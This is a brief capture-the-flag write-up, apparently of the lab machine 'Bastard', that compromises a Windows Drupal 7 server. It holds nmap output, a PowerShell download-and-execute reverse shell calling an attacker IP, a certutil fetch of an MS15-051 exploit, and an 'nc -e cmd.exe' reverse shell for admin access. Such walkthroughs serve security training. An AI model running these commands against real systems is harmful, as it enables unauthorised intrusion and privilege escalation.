Recon
$nmap -p- -A 10.129.139.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 15:27 UTC
Nmap scan report for 10.129.139.175
Host is up (0.032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsDrupal CMS welcomes us on port 80.
We can grab it’s version by going to /CHANGELOG.TXT.
Checing it with NIST, we can see that it has juicy 9.8 Critical CVE.
We can find then PoC of the exploit on github.
We can get reverse shell using Invoke-PowerShellTcp.ps1
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.66.152:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.66.152 -Port 4242Privilage escalation
It’s vanilla windows 2008 server, so we can run exec exploiting MS15-051.
We can send it over using http-server again, and get it using certutil.exe -urlcache -split -f http://10.10.16.21/ms15-051x64.exe ms15-051x64.exe.
It works, so we can get reverse shell with admin, by sending over nc and running ".\ms15-051x64.exe “nc.exe -e cmd.exe 10.10.16.21 5555”